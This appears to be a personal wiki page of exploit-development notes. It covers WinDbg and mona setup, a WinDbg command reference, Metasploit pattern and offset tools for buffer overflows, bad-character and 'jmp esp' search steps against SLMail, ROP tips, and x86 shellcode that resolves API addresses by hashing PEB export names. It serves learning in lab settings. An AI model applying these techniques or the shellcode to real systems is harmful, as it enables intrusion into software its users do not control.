Exploit developpment

<div class="attachments-files">

	
	
		
            <li>
                <a href="/exploit/_index.files/PYKD_BOOTSTRAPPER_2.0.0.16.zip" >
                    PYKD_BOOTSTRAPPER_2.0.0.16.zip
                </a>
                (290 ko)
            </li>
		
	

	
	
		
            <li>
                <a href="/exploit/_index.files/bp.txt" >
                    bp.txt
                </a>
                (0 ko)
            </li>
		
	

	
	
		
            <li>
                <a href="/exploit/_index.files/hs-x64.dll" >
                    hs-x64.dll
                </a>
                (440 ko)
            </li>
		
	

	
	
		
            <li>
                <a href="/exploit/_index.files/mona.py" >
                    mona.py
                </a>
                (615 ko)
            </li>
		
	

	
	
		
            <li>
                <a href="/exploit/_index.files/pin.zip" >
                    pin.zip
                </a>
                (72215 ko)
            </li>
		
	

	
	
		
            <li>
                <a href="/exploit/_index.files/run_http_server.bat" >
                    run_http_server.bat
                </a>
                (0 ko)
            </li>
		
	

	
	
		
            <li>
                <a href="/exploit/_index.files/test_exploit.bat" >
                    test_exploit.bat
                </a>
                (0 ko)
            </li>
		
	

<div>

Debug Microsoft Internet Explorer

Web Server

python -m http.server 80

Launch IE and attach WinDbg to it

"C:\Program Files\Debugging Tools for Windows (x64)\windbg.exe" -g -G -o -hd -Q "C:\Program Files\Internet Explorer\iexplore.exe" http://127.0.0.1/CVE_2018_8174_PoC.html
  • -g Skips initial breakpoints and launch the application

  • -G Skips ending breakpoints and closes the application

  • -o Debugs child processes

  • -hd Disables debug heap since an application run under the debugger will have extra metadata in its heap. This is fine when debugging an application, however for creating an exploit it is not good, since the heap must have the same content and layout as when run without a debugger.

  • -Q Does not prompt to save workspace on exit

Force loading page from server

iesettings.png

WinDbg

Debug jsscript

Debug -> Event Filters

$$<C:\bp\bp.txt;g

Syntax Color

copy hs-x64.dll in windbg install directory, load with .load hs-x64

File asm.ini is created.

Symbol

Environnement variable :

_NT_SYMBOL_PATH to srv*https://msdl.microsoft.com/download/symbols

Mona installation

Download https://githomelab.ru/pykd/pykd/wikis/Pykd-bootstrapper

put in C:\Program Files\Debugging Tools for Windows (x64)\winext

Download windbglib: https://github.com/corelan/windbglib/raw/master/windbglib.py

Download mona: https://github.com/corelan/mona/raw/master/mona.py

put in C:\Program Files\Debugging Tools for Windows (x64)

!pip install pykd

Validate installation

!py mona

In case of (with correct installation):

0:000> !py mona
No export mona found

Try :

.load pykd
!py mona config -set workingfolder "C:\logs\%p"

Generate cyclic pattern (like pattern_create.rb of metasploit)

!mona pc 20000
!mona findmsp

Mona memo : https://connect.ed-diamond.com/MISC/MISC-079/Ramonage-de-vulns-avec-mona.py

Commands

General
Display program’s header!dh program.exe
List loaded modules with full pathlm -f
Dump PEB structuredt ntdll!_PEB
Search all symbol starting by virtual in module kernelx kernel32!virtual*
Switch between 32 and 64 bits mode!wow64exts.sw
Evaluate an expression? @eax+4
Tracing and stepping
Step overp
Step int
Step until address is reachedpa address
Step to next CALL instructionpc
Steps through until the next return instructionpt
Toggle displaying of registerspr
Execute until the current function is completegu
List existing breakpoints. Each breakpoint listed has a number in the listbl
Clear all breakpointsbc *
Clear breakpoint identified by numberbc number
Enable breakpoint identified by numberbe number
Disable breakpoint identified by numberbd number
Breakpoint at adresse after n passesbp address n
Memory
Display double-words at address.dd address / dd address LLength
Display unicode chars at addressdu address / du address LLength
Display mix word and ascii at addressdc address / dc address LLength
Display pointer valuedd poi(esp)
Evaluates to the dword (or qword, if in 64-bit mode) at the address ebp+4ddpoi(ebp+4
Set byte at address to valueeb address value
Set word at address to valueew address value
Set double-word at address to valueed address value
Set Value of registerr @esp=value
Disassembleub 75b720ae L80
Search in memory ranges 01370000 04cfa000 37 37 79 01 8b 40 1c c3
Search in from memory to memory+Length (with writable permission)s -wa address LLength “pattern”
Check page permission!address 75b720ae
Fill memory location with pattern “ABC”f address LLength ‘A’ ‘B’ ‘C’
Assemble instruction at addressa @adresse [press enter to start editing / enter on empty line to exit]
Call stack
Display call stackk
Display call stack with first three parameters passed to each functionkb
display stackdd @$csp L4
Display eax and edx registersr eax,edx

Buffer overflow

Generate pattern

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000

Find the offset

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 8Di9 -l 3000
[*] Exact match at offset 2606

Convert instruction to opcode

/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > jmp esp
00000000  FFE4              jmp esp

[Mona] - Define folder for output :

!mona config -set workingfolder c:\logs\%p

[Mona] - Generate byte array exclude \x00 & \x0a :

!mona bytearray -cpb "\x00\x0a"

[Mona] - Compare array :

!mona compare -f C:\logs\slmail\bytearray.bin -a 00AFFD44

[Mona] - Find ESP

!mona find -s "\x53\x6d\x79\x76" -m slmfc.dll

Immunity debugger

Restore view

alt text

IDA

Tracing with PIN

alt text

<div class="attachments-files">

	
	
		
	

	
	
		
	

	
	
		
	

	
	
		
	

	
	
		
            <li>
                <a href="/exploit/_index.files/pin.zip" >
                    pin.zip
                </a>
                (72215 ko)
            </li>
		
	

	
	
		
	

	
	
		
	

<div>

ROP

Working with gadgets

Find base address with IDA

  • In Menu: Edit>Segments>rebase program.

  • Run in Ida python console:

print "%x" % (idaapi.get_imagebase())

Equivalent to memcpy

ECX : size to copy

rep movsd dword ptr es:[edi], dword ptr [esi]

Vulnerable applications to practice

  • minishare 1.4.1
  • Savant 3.1
  • Warftpd 1.6.5 (only XP)

Playing with PEB

  • check Find procedure from hash
 __declspec(naked) void __fastcall shellcode(){

	 __asm{

	jmp SHORT _tmain

	find_hash:								; InInitOrder list of modules:
	    xor     EDI, EDI                    ; EDI = 0
	   
	    mov     EDI, fs:[EDI + 0x30]        ; EDI = &(PEB) ([FS:0x30])
	    mov     EDI, [EDI + 0x0C]           ; EDI = PEB->Ldr
	    mov     EDI, [EDI + 0x1C]           ; EDI = PEB->Ldr.InInitOrder (first module)
	next_module:							; Get the baseaddress of the current module and find the next module:
	    mov     EBP, [EDI + 0x08]           ; EBP = InInitOrder[X].base_address
	    mov     EDI, [EDI]                  ; EDI = InInitOrder[X].flink == InInitOrder[X+1]
	get_proc_address_loop:					; Find the PE header and export and names tables of the module:
	    mov     EBX, [EBP + 0x3C]           ; EBX = &(PE header)
	    mov     EBX, [EBP + EBX + 0x78]     ; EBX = offset(export table)
	    add     EBX, EBP                    ; EBX = &(export table)
	    mov     ECX, [EBX + 0x18]           ; ECX = number of name pointers
	    jcxz    next_module                 ; No name pointers? Next module.
	next_function_loop:						; Get the next function name for hashing:
	    mov     ESI, [EBX + 0x20]           ; ESI = offset(names table)
	    add     ESI, EBP                    ; ESI = &(names table)
	    mov     ESI, [ESI + ECX * 4 - 4]    ; ESI = offset(function name)
	    add     ESI, EBP                    ; ESI = &(function name)
	    xor     EAX, EAX                    	; EAX = 0	

		; section checksum
		cdq										
		mov    edx, 15h

		crc_l0:

			lodsb
			crc32  edx, al						; see https://www.gladir.com/LEXIQUE/ASM/crc32.htm
			
		cmp al,0
		jne    crc_l0

		mov eax, dword ptr[esp+4]
		cmp eax, edx


	    loopne  next_function_loop          	; Not the right hash and functions left in module? Next function
	    jne     next_module                 	; Not the right hash and no functions left in module? Next module
	    ; Found the right hash: get the address of the function:
	    mov     EDX, [EBX + 0x24]           	; EDX = offset ordinals table
	    ADD     EDX, EBP                    	; EDX = &oridinals table
	    movzx   EDX, WORD PTR [EDX + 2 * ECX]   ; EDX = ordinal number of function
	    mov     EDI, [EBX + 0x1C]           	; EDI = offset address table
	    add     EDI, EBP                    	; EDI = &address table
	    add     EBP, [EDI + 4 * EDX]        	; EBP = &(function)

		retn

_tmain:
	; GetProcAddress
	push 0x575fac99
	call find_hash

	mov ebx,eax

 }
}